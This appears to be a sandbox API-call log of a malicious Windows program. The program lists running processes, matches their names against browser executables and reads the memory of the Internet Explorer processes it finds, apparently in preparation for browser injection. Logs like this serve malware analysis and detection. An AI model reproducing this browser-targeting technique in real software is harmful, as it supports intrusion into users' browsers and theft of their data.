	[0230.014] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0230.015] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x66b0
	[0230.015] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.015] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0230.016] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.016] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.016] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.016] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0230.017] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.017] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.017] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0230.018] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x66b4
	[0230.018] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.018] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0230.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.019] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.019] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0230.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.019] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.019] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0230.020] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x66b8
	[0230.020] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.020] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0230.021] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.021] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.021] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.021] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0230.021] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.021] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.021] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0230.022] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x66bc
	[0230.022] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.023] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0230.023] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.023] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.023] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.023] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0230.024] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.024] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.024] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0230.025] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x66c0
	[0230.025] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.025] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0230.025] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.025] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.026] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.026] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0230.027] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.027] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.027] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0230.028] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x66c4
	[0230.028] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.028] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0230.028] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.028] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.028] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.028] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0230.029] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.029] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.029] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0230.030] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x66c8
	[0230.030] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.030] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0230.030] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.030] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.030] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.031] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0230.031] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.031] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.031] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0230.032] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x66cc
	[0230.032] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.032] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0230.033] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.033] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.033] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.033] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0230.034] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.034] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.034] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0230.035] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x66d0
	[0230.035] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.035] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0230.035] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.035] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.035] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.035] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0230.036] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.036] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.036] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0230.036] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x66d4
	[0230.037] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.037] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0230.037] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.037] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.037] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.037] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0230.037] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.037] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.038] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0230.038] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x66d8
	[0230.039] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.039] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0230.039] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.039] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.040] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.040] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0230.040] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.040] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.040] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0230.041] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x66dc
	[0230.041] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.041] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0230.042] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.042] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.042] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.042] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0230.043] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.043] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.043] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0230.044] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x66e0
	[0230.044] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.044] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0230.045] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.045] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.045] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.045] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0230.046] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.046] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.046] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0230.047] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x66e4
	[0230.047] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.047] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0230.047] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.047] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.048] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.048] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0230.049] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.049] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.049] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0230.050] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x66e8
	[0230.050] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.050] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0230.051] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.051] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.051] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.051] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0230.051] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.051] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.052] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0230.053] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x66ec
	[0230.053] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.053] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0230.053] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.053] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0230.053] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.053] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0230.054] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.111] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.112] NtQueryInformationProcess (in: ProcessHandle=0x66ec, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0230.112] ReadProcessMemory (in: hProcess=0x66ec, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0230.112] ReadProcessMemory (in: hProcess=0x66ec, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0230.112] ReadProcessMemory (in: hProcess=0x66ec, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0230.112] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0230.112] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0230.113] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x66f0
	[0230.113] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.113] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0230.113] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.113] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0230.114] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.114] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0230.114] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.114] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.114] NtQueryInformationProcess (in: ProcessHandle=0x66f0, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0230.114] ReadProcessMemory (in: hProcess=0x66f0, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0230.114] ReadProcessMemory (in: hProcess=0x66f0, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0230.115] ReadProcessMemory (in: hProcess=0x66f0, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0230.115] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0230.115] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0230.116] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x66f4
	[0230.116] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.116] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0230.116] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.116] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.116] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.116] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0230.117] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.117] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.117] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0230.118] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x66f8
	[0230.118] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.118] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0230.118] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.118] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.119] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.119] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0230.119] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.119] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.119] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0230.120] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x66fc
	[0230.120] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.120] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0230.120] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.120] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.121] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.121] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0230.121] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.121] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.121] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0230.122] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0230.123] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x6700
	[0230.123] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.123] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0230.123] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.123] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.124] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.124] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0230.124] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.124] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.124] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0230.125] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x6704
	[0230.125] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.125] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0230.125] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.125] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.126] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.126] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0230.126] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.126] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.126] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0230.127] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x6708
